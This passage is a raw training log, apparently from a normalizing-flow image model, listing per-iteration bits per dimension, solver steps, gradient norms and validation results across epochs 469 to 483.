Loss 1.0738(1.0760) | Error 0.0000(0.0000) Steps 440(442.16) | Grad Norm 0.0628(0.0782) | Total Time 10.00(10.00)\nIter 5255 | Time 39.1111(40.4953) | Bit/dim 1.0763(1.0760) | Xent 0.0000(0.0000) | Loss 1.0763(1.0760) | Error 0.0000(0.0000) Steps 446(442.27) | Grad Norm 0.0636(0.0778) | Total Time 10.00(10.00)\nIter 5256 | Time 40.7120(40.5018) | Bit/dim 1.0748(1.0760) | Xent 0.0000(0.0000) | Loss 1.0748(1.0760) | Error 0.0000(0.0000) Steps 446(442.39) | Grad Norm 0.1025(0.0785) | Total Time 10.00(10.00)\nIter 5257 | Time 40.4303(40.4997) | Bit/dim 1.0776(1.0760) | Xent 0.0000(0.0000) | Loss 1.0776(1.0760) | Error 0.0000(0.0000) Steps 440(442.31) | Grad Norm 0.0772(0.0785) | Total Time 10.00(10.00)\nIter 5258 | Time 42.8562(40.5704) | Bit/dim 1.0725(1.0759) | Xent 0.0000(0.0000) | Loss 1.0725(1.0759) | Error 0.0000(0.0000) Steps 440(442.24) | Grad Norm 0.0934(0.0790) | Total Time 10.00(10.00)\nIter 5259 | Time 40.6342(40.5723) | Bit/dim 1.0832(1.0761) | Xent 0.0000(0.0000) | Loss 1.0832(1.0761) | Error 0.0000(0.0000) Steps 446(442.36) | Grad Norm 0.0515(0.0781) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0469 | Time 14.7316, Epoch Time 313.4270(310.4473), Bit/dim 1.0709(best: 1.0705), Xent 0.0000, Loss 1.0709, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5260 | Time 39.1431(40.5294) | Bit/dim 1.0745(1.0761) | Xent 0.0000(0.0000) | Loss 1.0745(1.0761) | Error 0.0000(0.0000) Steps 446(442.47) | Grad Norm 0.0967(0.0787) | Total Time 10.00(10.00)\nIter 5261 | Time 40.9703(40.5426) | Bit/dim 1.0762(1.0761) | Xent 0.0000(0.0000) | Loss 1.0762(1.0761) | Error 0.0000(0.0000) Steps 440(442.39) | Grad Norm 0.0785(0.0787) | Total Time 10.00(10.00)\nIter 5262 | Time 41.5907(40.5741) | Bit/dim 1.0742(1.0760) | Xent 0.0000(0.0000) | Loss 1.0742(1.0760) | Error 0.0000(0.0000) Steps 440(442.32) | Grad Norm 0.0586(0.0781) | Total Time 10.00(10.00)\nIter 5263 | Time 40.6891(40.5775) | Bit/dim 1.0771(1.0761) | Xent 0.0000(0.0000) | Loss 1.0771(1.0761) | Error 0.0000(0.0000) Steps 446(442.43) | Grad Norm 0.0713(0.0779) | Total Time 10.00(10.00)\nIter 5264 | Time 41.7738(40.6134) | Bit/dim 1.0732(1.0760) | Xent 0.0000(0.0000) | Loss 1.0732(1.0760) | Error 0.0000(0.0000) Steps 440(442.36) | Grad Norm 0.0652(0.0775) | Total Time 10.00(10.00)\nIter 5265 | Time 40.6529(40.6146) | Bit/dim 1.0806(1.0761) | Xent 0.0000(0.0000) | Loss 1.0806(1.0761) | Error 0.0000(0.0000) Steps 440(442.29) | Grad Norm 0.0587(0.0769) | Total Time 10.00(10.00)\nIter 5266 | Time 39.6291(40.5850) | Bit/dim 1.0752(1.0761) | Xent 0.0000(0.0000) | Loss 1.0752(1.0761) | Error 0.0000(0.0000) Steps 446(442.40) | Grad Norm 0.1061(0.0778) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0470 | Time 14.8345, Epoch Time 311.6646(310.4838), Bit/dim 1.0709(best: 1.0705), Xent 0.0000, Loss 1.0709, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5267 | Time 41.5769(40.6148) | Bit/dim 1.0786(1.0762) | Xent 0.0000(0.0000) | Loss 1.0786(1.0762) | Error 0.0000(0.0000) Steps 440(442.33) | Grad Norm 0.0909(0.0782) | Total Time 10.00(10.00)\nIter 5268 | Time 39.1299(40.5703) | Bit/dim 1.0757(1.0761) | Xent 0.0000(0.0000) | Loss 1.0757(1.0761) | Error 0.0000(0.0000) Steps 446(442.44) | Grad Norm 0.0606(0.0777) | Total Time 10.00(10.00)\nIter 5269 | Time 39.5707(40.5403) | Bit/dim 1.0777(1.0762) | Xent 0.0000(0.0000) | Loss 1.0777(1.0762) | Error 0.0000(0.0000) Steps 440(442.36) | Grad Norm 0.0959(0.0782) | Total Time 10.00(10.00)\nIter 5270 | Time 40.1597(40.5289) | Bit/dim 1.0765(1.0762) | Xent 0.0000(0.0000) | Loss 1.0765(1.0762) | Error 0.0000(0.0000) Steps 446(442.47) | Grad Norm 0.0951(0.0787) | Total Time 10.00(10.00)\nIter 5271 | Time 39.7964(40.5069) | Bit/dim 1.0759(1.0762) | Xent 0.0000(0.0000) | Loss 1.0759(1.0762) | Error 0.0000(0.0000) Steps 446(442.58) | Grad Norm 0.0778(0.0787) | Total Time 10.00(10.00)\nIter 5272 | Time 40.3081(40.5009) | Bit/dim 1.0728(1.0761) | Xent 0.0000(0.0000) | Loss 1.0728(1.0761) | Error 0.0000(0.0000) Steps 446(442.68) | Grad Norm 0.0723(0.0785) | Total Time 10.00(10.00)\nIter 5273 | Time 41.8248(40.5406) | Bit/dim 1.0770(1.0761) | Xent 0.0000(0.0000) | Loss 1.0770(1.0761) | Error 0.0000(0.0000) Steps 440(442.60) | Grad Norm 0.0760(0.0784) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0471 | Time 14.8883, Epoch Time 310.1920(310.4750), Bit/dim 1.0705(best: 1.0705), Xent 0.0000, Loss 1.0705, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5274 | Time 41.4313(40.5674) | Bit/dim 1.0788(1.0762) | Xent 0.0000(0.0000) | Loss 1.0788(1.0762) | Error 0.0000(0.0000) Steps 440(442.52) | Grad Norm 0.1281(0.0799) | Total Time 10.00(10.00)\nIter 5275 | Time 41.0447(40.5817) | Bit/dim 1.0735(1.0761) | Xent 0.0000(0.0000) | Loss 1.0735(1.0761) | Error 0.0000(0.0000) Steps 440(442.45) | Grad Norm 0.0857(0.0801) | Total Time 10.00(10.00)\nIter 5276 | Time 41.6900(40.6149) | Bit/dim 1.0778(1.0762) | Xent 0.0000(0.0000) | Loss 1.0778(1.0762) | Error 0.0000(0.0000) Steps 446(442.55) | Grad Norm 0.0770(0.0800) | Total Time 10.00(10.00)\nIter 5277 | Time 39.3088(40.5757) | Bit/dim 1.0780(1.0762) | Xent 0.0000(0.0000) | Loss 1.0780(1.0762) | Error 0.0000(0.0000) Steps 440(442.48) | Grad Norm 0.0746(0.0798) | Total Time 10.00(10.00)\nIter 5278 | Time 41.2831(40.5970) | Bit/dim 1.0702(1.0760) | Xent 0.0000(0.0000) | Loss 1.0702(1.0760) | Error 0.0000(0.0000) Steps 440(442.40) | Grad Norm 0.0758(0.0797) | Total Time 10.00(10.00)\nIter 5279 | Time 40.5564(40.5957) | Bit/dim 1.0792(1.0761) | Xent 0.0000(0.0000) | Loss 1.0792(1.0761) | Error 0.0000(0.0000) Steps 446(442.51) | Grad Norm 0.1198(0.0809) | Total Time 10.00(10.00)\nIter 5280 | Time 40.7154(40.5993) | Bit/dim 1.0777(1.0762) | Xent 0.0000(0.0000) | Loss 1.0777(1.0762) | Error 0.0000(0.0000) Steps 440(442.44) | Grad Norm 0.1168(0.0820) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0472 | Time 15.1117, Epoch Time 313.5438(310.5671), Bit/dim 1.0707(best: 1.0705), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5281 | Time 38.5202(40.5370) | Bit/dim 1.0764(1.0762) | Xent 0.0000(0.0000) | Loss 1.0764(1.0762) | Error 0.0000(0.0000) Steps 440(442.36) | Grad Norm 0.0629(0.0814) | Total Time 10.00(10.00)\nIter 5282 | Time 39.4659(40.5048) | Bit/dim 1.0736(1.0761) | Xent 0.0000(0.0000) | Loss 1.0736(1.0761) | Error 0.0000(0.0000) Steps 440(442.29) | Grad Norm 0.1035(0.0821) | Total Time 10.00(10.00)\nIter 5283 | Time 42.6319(40.5686) | Bit/dim 1.0759(1.0761) | Xent 0.0000(0.0000) | Loss 1.0759(1.0761) | Error 0.0000(0.0000) Steps 440(442.22) | Grad Norm 0.1102(0.0829) | Total Time 10.00(10.00)\nIter 5284 | Time 40.7334(40.5736) | Bit/dim 1.0765(1.0761) | Xent 0.0000(0.0000) | Loss 1.0765(1.0761) | Error 0.0000(0.0000) Steps 440(442.16) | Grad Norm 0.1525(0.0850) | Total Time 10.00(10.00)\nIter 5285 | Time 41.2141(40.5928) | Bit/dim 1.0767(1.0761) | Xent 0.0000(0.0000) | Loss 1.0767(1.0761) | Error 0.0000(0.0000) Steps 440(442.09) | Grad Norm 0.0851(0.0850) | Total Time 10.00(10.00)\nIter 5286 | Time 39.8996(40.5720) | Bit/dim 1.0804(1.0763) | Xent 0.0000(0.0000) | Loss 1.0804(1.0763) | Error 0.0000(0.0000) Steps 440(442.03) | Grad Norm 0.1110(0.0858) | Total Time 10.00(10.00)\nIter 5287 | Time 39.9301(40.5527) | Bit/dim 1.0738(1.0762) | Xent 0.0000(0.0000) | Loss 1.0738(1.0762) | Error 0.0000(0.0000) Steps 440(441.97) | Grad Norm 0.1017(0.0863) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0473 | Time 15.0386, Epoch Time 310.0613(310.5519), Bit/dim 1.0712(best: 1.0705), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5288 | Time 40.6592(40.5559) | Bit/dim 1.0745(1.0761) | Xent 0.0000(0.0000) | Loss 1.0745(1.0761) | Error 0.0000(0.0000) Steps 446(442.09) | Grad Norm 0.0799(0.0861) | Total Time 10.00(10.00)\nIter 5289 | Time 39.4830(40.5237) | Bit/dim 1.0742(1.0761) | Xent 0.0000(0.0000) | Loss 1.0742(1.0761) | Error 0.0000(0.0000) Steps 446(442.21) | Grad Norm 0.0811(0.0859) | Total Time 10.00(10.00)\nIter 5290 | Time 41.3474(40.5485) | Bit/dim 1.0728(1.0760) | Xent 0.0000(0.0000) | Loss 1.0728(1.0760) | Error 0.0000(0.0000) Steps 440(442.14) | Grad Norm 0.0592(0.0851) | Total Time 10.00(10.00)\nIter 5291 | Time 39.7647(40.5249) | Bit/dim 1.0806(1.0761) | Xent 0.0000(0.0000) | Loss 1.0806(1.0761) | Error 0.0000(0.0000) Steps 440(442.08) | Grad Norm 0.1162(0.0861) | Total Time 10.00(10.00)\nIter 5292 | Time 39.6829(40.4997) | Bit/dim 1.0770(1.0761) | Xent 0.0000(0.0000) | Loss 1.0770(1.0761) | Error 0.0000(0.0000) Steps 440(442.01) | Grad Norm 0.0867(0.0861) | Total Time 10.00(10.00)\nIter 5293 | Time 40.3434(40.4950) | Bit/dim 1.0751(1.0761) | Xent 0.0000(0.0000) | Loss 1.0751(1.0761) | Error 0.0000(0.0000) Steps 446(442.13) | Grad Norm 0.1214(0.0871) | Total Time 10.00(10.00)\nIter 5294 | Time 40.3874(40.4918) | Bit/dim 1.0746(1.0761) | Xent 0.0000(0.0000) | Loss 1.0746(1.0761) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.0728(0.0867) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0474 | Time 15.0040, Epoch Time 309.1928(310.5111), Bit/dim 1.0710(best: 1.0705), Xent 0.0000, Loss 1.0710, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5295 | Time 40.7943(40.5008) | Bit/dim 1.0757(1.0761) | Xent 0.0000(0.0000) | Loss 1.0757(1.0761) | Error 0.0000(0.0000) Steps 440(442.01) | Grad Norm 0.0806(0.0865) | Total Time 10.00(10.00)\nIter 5296 | Time 42.8410(40.5710) | Bit/dim 1.0730(1.0760) | Xent 0.0000(0.0000) | Loss 1.0730(1.0760) | Error 0.0000(0.0000) Steps 440(441.95) | Grad Norm 0.0840(0.0865) | Total Time 10.00(10.00)\nIter 5297 | Time 40.2236(40.5606) | Bit/dim 1.0765(1.0760) | Xent 0.0000(0.0000) | Loss 1.0765(1.0760) | Error 0.0000(0.0000) Steps 440(441.89) | Grad Norm 0.1258(0.0876) | Total Time 10.00(10.00)\nIter 5298 | Time 40.7980(40.5677) | Bit/dim 1.0779(1.0760) | Xent 0.0000(0.0000) | Loss 1.0779(1.0760) | Error 0.0000(0.0000) Steps 440(441.83) | Grad Norm 0.0527(0.0866) | Total Time 10.00(10.00)\nIter 5299 | Time 40.9142(40.5781) | Bit/dim 1.0743(1.0760) | Xent 0.0000(0.0000) | Loss 1.0743(1.0760) | Error 0.0000(0.0000) Steps 446(441.96) | Grad Norm 0.0732(0.0862) | Total Time 10.00(10.00)\nIter 5300 | Time 41.1872(40.5964) | Bit/dim 1.0786(1.0761) | Xent 0.0000(0.0000) | Loss 1.0786(1.0761) | Error 0.0000(0.0000) Steps 440(441.90) | Grad Norm 0.1151(0.0871) | Total Time 10.00(10.00)\nIter 5301 | Time 39.4416(40.5618) | Bit/dim 1.0780(1.0761) | Xent 0.0000(0.0000) | Loss 1.0780(1.0761) | Error 0.0000(0.0000) Steps 446(442.02) | Grad Norm 0.1593(0.0892) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0475 | Time 14.7939, Epoch Time 313.2932(310.5946), Bit/dim 1.0709(best: 1.0705), Xent 0.0000, Loss 1.0709, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5302 | Time 39.7232(40.5366) | Bit/dim 1.0797(1.0762) | Xent 0.0000(0.0000) | Loss 1.0797(1.0762) | Error 0.0000(0.0000) Steps 446(442.14) | Grad Norm 0.0647(0.0885) | Total Time 10.00(10.00)\nIter 5303 | Time 41.0196(40.5511) | Bit/dim 1.0805(1.0764) | Xent 0.0000(0.0000) | Loss 1.0805(1.0764) | Error 0.0000(0.0000) Steps 440(442.08) | Grad Norm 0.0916(0.0886) | Total Time 10.00(10.00)\nIter 5304 | Time 39.3262(40.5143) | Bit/dim 1.0740(1.0763) | Xent 0.0000(0.0000) | Loss 1.0740(1.0763) | Error 0.0000(0.0000) Steps 440(442.01) | Grad Norm 0.0641(0.0878) | Total Time 10.00(10.00)\nIter 5305 | Time 39.1922(40.4747) | Bit/dim 1.0820(1.0765) | Xent 0.0000(0.0000) | Loss 1.0820(1.0765) | Error 0.0000(0.0000) Steps 440(441.95) | Grad Norm 0.0776(0.0875) | Total Time 10.00(10.00)\nIter 5306 | Time 42.2763(40.5287) | Bit/dim 1.0719(1.0763) | Xent 0.0000(0.0000) | Loss 1.0719(1.0763) | Error 0.0000(0.0000) Steps 440(441.89) | Grad Norm 0.1230(0.0886) | Total Time 10.00(10.00)\nIter 5307 | Time 40.3636(40.5238) | Bit/dim 1.0686(1.0761) | Xent 0.0000(0.0000) | Loss 1.0686(1.0761) | Error 0.0000(0.0000) Steps 446(442.02) | Grad Norm 0.1003(0.0890) | Total Time 10.00(10.00)\nIter 5308 | Time 41.8175(40.5626) | Bit/dim 1.0768(1.0761) | Xent 0.0000(0.0000) | Loss 1.0768(1.0761) | Error 0.0000(0.0000) Steps 446(442.14) | Grad Norm 0.0933(0.0891) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0476 | Time 14.9803, Epoch Time 311.2121(310.6131), Bit/dim 1.0705(best: 1.0705), Xent 0.0000, Loss 1.0705, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5309 | Time 40.9006(40.5727) | Bit/dim 1.0762(1.0761) | Xent 0.0000(0.0000) | Loss 1.0762(1.0761) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.1373(0.0905) | Total Time 10.00(10.00)\nIter 5310 | Time 39.8021(40.5496) | Bit/dim 1.0794(1.0762) | Xent 0.0000(0.0000) | Loss 1.0794(1.0762) | Error 0.0000(0.0000) Steps 446(442.19) | Grad Norm 0.0741(0.0900) | Total Time 10.00(10.00)\nIter 5311 | Time 39.2511(40.5107) | Bit/dim 1.0737(1.0761) | Xent 0.0000(0.0000) | Loss 1.0737(1.0761) | Error 0.0000(0.0000) Steps 440(442.13) | Grad Norm 0.0612(0.0892) | Total Time 10.00(10.00)\nIter 5312 | Time 41.2971(40.5342) | Bit/dim 1.0737(1.0761) | Xent 0.0000(0.0000) | Loss 1.0737(1.0761) | Error 0.0000(0.0000) Steps 446(442.24) | Grad Norm 0.0676(0.0885) | Total Time 10.00(10.00)\nIter 5313 | Time 39.1566(40.4929) | Bit/dim 1.0826(1.0763) | Xent 0.0000(0.0000) | Loss 1.0826(1.0763) | Error 0.0000(0.0000) Steps 440(442.17) | Grad Norm 0.0807(0.0883) | Total Time 10.00(10.00)\nIter 5314 | Time 40.4390(40.4913) | Bit/dim 1.0751(1.0762) | Xent 0.0000(0.0000) | Loss 1.0751(1.0762) | Error 0.0000(0.0000) Steps 440(442.11) | Grad Norm 0.0816(0.0881) | Total Time 10.00(10.00)\nIter 5315 | Time 40.0474(40.4780) | Bit/dim 1.0717(1.0761) | Xent 0.0000(0.0000) | Loss 1.0717(1.0761) | Error 0.0000(0.0000) Steps 446(442.23) | Grad Norm 0.1259(0.0892) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0477 | Time 14.8776, Epoch Time 308.3316(310.5447), Bit/dim 1.0707(best: 1.0705), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5316 | Time 41.2166(40.5001) | Bit/dim 1.0755(1.0761) | Xent 0.0000(0.0000) | Loss 1.0755(1.0761) | Error 0.0000(0.0000) Steps 440(442.16) | Grad Norm 0.0558(0.0882) | Total Time 10.00(10.00)\nIter 5317 | Time 42.2905(40.5539) | Bit/dim 1.0807(1.0762) | Xent 0.0000(0.0000) | Loss 1.0807(1.0762) | Error 0.0000(0.0000) Steps 446(442.27) | Grad Norm 0.0585(0.0873) | Total Time 10.00(10.00)\nIter 5318 | Time 41.2355(40.5743) | Bit/dim 1.0729(1.0761) | Xent 0.0000(0.0000) | Loss 1.0729(1.0761) | Error 0.0000(0.0000) Steps 440(442.21) | Grad Norm 0.0889(0.0874) | Total Time 10.00(10.00)\nIter 5319 | Time 39.6265(40.5459) | Bit/dim 1.0726(1.0760) | Xent 0.0000(0.0000) | Loss 1.0726(1.0760) | Error 0.0000(0.0000) Steps 446(442.32) | Grad Norm 0.1160(0.0882) | Total Time 10.00(10.00)\nIter 5320 | Time 39.1635(40.5044) | Bit/dim 1.0777(1.0761) | Xent 0.0000(0.0000) | Loss 1.0777(1.0761) | Error 0.0000(0.0000) Steps 446(442.43) | Grad Norm 0.0989(0.0886) | Total Time 10.00(10.00)\nIter 5321 | Time 41.5867(40.5369) | Bit/dim 1.0810(1.0762) | Xent 0.0000(0.0000) | Loss 1.0810(1.0762) | Error 0.0000(0.0000) Steps 440(442.36) | Grad Norm 0.1183(0.0894) | Total Time 10.00(10.00)\nIter 5322 | Time 40.7757(40.5440) | Bit/dim 1.0705(1.0760) | Xent 0.0000(0.0000) | Loss 1.0705(1.0760) | Error 0.0000(0.0000) Steps 440(442.29) | Grad Norm 0.0929(0.0895) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0478 | Time 14.7956, Epoch Time 313.1077(310.6216), Bit/dim 1.0708(best: 1.0705), Xent 0.0000, Loss 1.0708, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5323 | Time 39.7718(40.5209) | Bit/dim 1.0778(1.0761) | Xent 0.0000(0.0000) | Loss 1.0778(1.0761) | Error 0.0000(0.0000) Steps 440(442.22) | Grad Norm 0.1172(0.0904) | Total Time 10.00(10.00)\nIter 5324 | Time 41.6978(40.5562) | Bit/dim 1.0740(1.0760) | Xent 0.0000(0.0000) | Loss 1.0740(1.0760) | Error 0.0000(0.0000) Steps 440(442.15) | Grad Norm 0.1245(0.0914) | Total Time 10.00(10.00)\nIter 5325 | Time 41.0852(40.5720) | Bit/dim 1.0777(1.0761) | Xent 0.0000(0.0000) | Loss 1.0777(1.0761) | Error 0.0000(0.0000) Steps 446(442.27) | Grad Norm 0.0865(0.0913) | Total Time 10.00(10.00)\nIter 5326 | Time 40.9601(40.5837) | Bit/dim 1.0811(1.0762) | Xent 0.0000(0.0000) | Loss 1.0811(1.0762) | Error 0.0000(0.0000) Steps 440(442.20) | Grad Norm 0.0849(0.0911) | Total Time 10.00(10.00)\nIter 5327 | Time 40.4756(40.5804) | Bit/dim 1.0757(1.0762) | Xent 0.0000(0.0000) | Loss 1.0757(1.0762) | Error 0.0000(0.0000) Steps 440(442.13) | Grad Norm 0.0855(0.0909) | Total Time 10.00(10.00)\nIter 5328 | Time 39.1014(40.5361) | Bit/dim 1.0754(1.0762) | Xent 0.0000(0.0000) | Loss 1.0754(1.0762) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.1186(0.0917) | Total Time 10.00(10.00)\nIter 5329 | Time 41.6570(40.5697) | Bit/dim 1.0679(1.0759) | Xent 0.0000(0.0000) | Loss 1.0679(1.0759) | Error 0.0000(0.0000) Steps 446(442.19) | Grad Norm 0.1058(0.0921) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0479 | Time 15.1347, Epoch Time 312.4300(310.6758), Bit/dim 1.0703(best: 1.0705), Xent 0.0000, Loss 1.0703, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5330 | Time 39.7138(40.5440) | Bit/dim 1.0768(1.0760) | Xent 0.0000(0.0000) | Loss 1.0768(1.0760) | Error 0.0000(0.0000) Steps 440(442.12) | Grad Norm 0.0630(0.0913) | Total Time 10.00(10.00)\nIter 5331 | Time 39.3839(40.5092) | Bit/dim 1.0761(1.0760) | Xent 0.0000(0.0000) | Loss 1.0761(1.0760) | Error 0.0000(0.0000) Steps 440(442.06) | Grad Norm 0.0583(0.0903) | Total Time 10.00(10.00)\nIter 5332 | Time 41.2088(40.5302) | Bit/dim 1.0729(1.0759) | Xent 0.0000(0.0000) | Loss 1.0729(1.0759) | Error 0.0000(0.0000) Steps 440(442.00) | Grad Norm 0.1006(0.0906) | Total Time 10.00(10.00)\nIter 5333 | Time 41.7253(40.5661) | Bit/dim 1.0760(1.0759) | Xent 0.0000(0.0000) | Loss 1.0760(1.0759) | Error 0.0000(0.0000) Steps 440(441.94) | Grad Norm 0.1068(0.0911) | Total Time 10.00(10.00)\nIter 5334 | Time 41.4427(40.5924) | Bit/dim 1.0769(1.0759) | Xent 0.0000(0.0000) | Loss 1.0769(1.0759) | Error 0.0000(0.0000) Steps 446(442.06) | Grad Norm 0.0694(0.0904) | Total Time 10.00(10.00)\nIter 5335 | Time 41.7991(40.6286) | Bit/dim 1.0739(1.0758) | Xent 0.0000(0.0000) | Loss 1.0739(1.0758) | Error 0.0000(0.0000) Steps 440(442.00) | Grad Norm 0.1107(0.0910) | Total Time 10.00(10.00)\nIter 5336 | Time 39.5457(40.5961) | Bit/dim 1.0781(1.0759) | Xent 0.0000(0.0000) | Loss 1.0781(1.0759) | Error 0.0000(0.0000) Steps 440(441.94) | Grad Norm 0.0858(0.0909) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0480 | Time 15.1040, Epoch Time 312.4846(310.7301), Bit/dim 1.0707(best: 1.0703), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5337 | Time 39.6210(40.5668) | Bit/dim 1.0777(1.0760) | Xent 0.0000(0.0000) | Loss 1.0777(1.0760) | Error 0.0000(0.0000) Steps 446(442.06) | Grad Norm 0.1413(0.0924) | Total Time 10.00(10.00)\nIter 5338 | Time 39.6508(40.5393) | Bit/dim 1.0795(1.0761) | Xent 0.0000(0.0000) | Loss 1.0795(1.0761) | Error 0.0000(0.0000) Steps 446(442.18) | Grad Norm 0.0595(0.0914) | Total Time 10.00(10.00)\nIter 5339 | Time 39.4404(40.5064) | Bit/dim 1.0748(1.0760) | Xent 0.0000(0.0000) | Loss 1.0748(1.0760) | Error 0.0000(0.0000) Steps 446(442.29) | Grad Norm 0.0557(0.0903) | Total Time 10.00(10.00)\nIter 5340 | Time 40.6892(40.5119) | Bit/dim 1.0739(1.0760) | Xent 0.0000(0.0000) | Loss 1.0739(1.0760) | Error 0.0000(0.0000) Steps 446(442.40) | Grad Norm 0.1227(0.0913) | Total Time 10.00(10.00)\nIter 5341 | Time 41.7356(40.5486) | Bit/dim 1.0736(1.0759) | Xent 0.0000(0.0000) | Loss 1.0736(1.0759) | Error 0.0000(0.0000) Steps 440(442.33) | Grad Norm 0.0556(0.0902) | Total Time 10.00(10.00)\nIter 5342 | Time 39.7160(40.5236) | Bit/dim 1.0762(1.0759) | Xent 0.0000(0.0000) | Loss 1.0762(1.0759) | Error 0.0000(0.0000) Steps 440(442.26) | Grad Norm 0.0728(0.0897) | Total Time 10.00(10.00)\nIter 5343 | Time 40.0155(40.5083) | Bit/dim 1.0758(1.0759) | Xent 0.0000(0.0000) | Loss 1.0758(1.0759) | Error 0.0000(0.0000) Steps 440(442.19) | Grad Norm 0.0948(0.0899) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0481 | Time 14.9759, Epoch Time 308.3272(310.6580), Bit/dim 1.0707(best: 1.0703), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5344 | Time 41.7376(40.5452) | Bit/dim 1.0728(1.0758) | Xent 0.0000(0.0000) | Loss 1.0728(1.0758) | Error 0.0000(0.0000) Steps 452(442.49) | Grad Norm 0.0606(0.0890) | Total Time 10.00(10.00)\nIter 5345 | Time 41.0888(40.5615) | Bit/dim 1.0785(1.0759) | Xent 0.0000(0.0000) | Loss 1.0785(1.0759) | Error 0.0000(0.0000) Steps 446(442.59) | Grad Norm 0.0595(0.0881) | Total Time 10.00(10.00)\nIter 5346 | Time 41.5907(40.5924) | Bit/dim 1.0739(1.0758) | Xent 0.0000(0.0000) | Loss 1.0739(1.0758) | Error 0.0000(0.0000) Steps 440(442.51) | Grad Norm 0.0678(0.0875) | Total Time 10.00(10.00)\nIter 5347 | Time 41.1110(40.6080) | Bit/dim 1.0810(1.0760) | Xent 0.0000(0.0000) | Loss 1.0810(1.0760) | Error 0.0000(0.0000) Steps 440(442.44) | Grad Norm 0.0617(0.0867) | Total Time 10.00(10.00)\nIter 5348 | Time 41.0658(40.6217) | Bit/dim 1.0792(1.0761) | Xent 0.0000(0.0000) | Loss 1.0792(1.0761) | Error 0.0000(0.0000) Steps 440(442.37) | Grad Norm 0.0955(0.0870) | Total Time 10.00(10.00)\nIter 5349 | Time 39.4118(40.5854) | Bit/dim 1.0742(1.0760) | Xent 0.0000(0.0000) | Loss 1.0742(1.0760) | Error 0.0000(0.0000) Steps 440(442.29) | Grad Norm 0.0586(0.0861) | Total Time 10.00(10.00)\nIter 5350 | Time 40.1895(40.5735) | Bit/dim 1.0720(1.0759) | Xent 0.0000(0.0000) | Loss 1.0720(1.0759) | Error 0.0000(0.0000) Steps 446(442.41) | Grad Norm 0.0639(0.0855) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0482 | Time 15.0070, Epoch Time 314.1069(310.7615), Bit/dim 1.0711(best: 1.0703), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5351 | Time 40.2856(40.5649) | Bit/dim 1.0812(1.0761) | Xent 0.0000(0.0000) | Loss 1.0812(1.0761) | Error 0.0000(0.0000) Steps 440(442.33) | Grad Norm 0.0726(0.0851) | Total Time 10.00(10.00)\nIter 5352 | Time 40.8242(40.5727) | Bit/dim 1.0762(1.0761) | Xent 0.0000(0.0000) | Loss 1.0762(1.0761) | Error 0.0000(0.0000) Steps 452(442.62) | Grad Norm 0.1148(0.0860) | Total Time 10.00(10.00)\nIter 5353 | Time 41.6918(40.6062) | Bit/dim 1.0733(1.0760) | Xent 0.0000(0.0000) | Loss 1.0733(1.0760) | Error 0.0000(0.0000) Steps 440(442.55) | Grad Norm 0.0686(0.0855) | Total Time 10.00(10.00)\nIter 5354 | Time 40.1304(40.5920) | Bit/dim 1.0753(1.0760) | Xent 0.0000(0.0000) | Loss 1.0753(1.0760) | Error 0.0000(0.0000) Steps 440(442.47) | Grad Norm 0.0639(0.0848) | Total Time 10.00(10.00)\nIter 5355 | Time 40.2848(40.5827) | Bit/dim 1.0728(1.0759) | Xent 0.0000(0.0000) | Loss 1.0728(1.0759) | Error 0.0000(0.0000) Steps 440(442.39) | Grad Norm 0.0632(0.0842) | Total Time 10.00(10.00)\nIter 5356 | Time 41.6299(40.6142) | Bit/dim 1.0719(1.0758) | Xent 0.0000(0.0000) | Loss 1.0719(1.0758) | Error 0.0000(0.0000) Steps 446(442.50) | Grad Norm 0.0822(0.0841) | Total Time 10.00(10.00)\nIter 5357 | Time 39.4931(40.5805) | Bit/dim 1.0742(1.0757) | Xent 0.0000(0.0000) | Loss 1.0742(1.0757) | Error 0.0000(0.0000) Steps 446(442.61) | Grad Norm 0.0515(0.0831) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0483 | Time 15.0515, Epoch Time 311.9444(310.7970), Bit/dim 1.0709(best: 1.0703), Xent 0.0000, Loss 1.0709, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5358 | Time 40.0295(40.5640) | Bit/dim 1.0714(1.0756) | Xent 0.0000(0.0000) | Loss 1.0714(1.0756) | Error 0.0000(0.0000) Steps 446(442.71) | Grad Norm 0.0655(0.0826) | Total Time 10.00(10.00)\nIter 5359 | Time 39.7195(40.5387) | 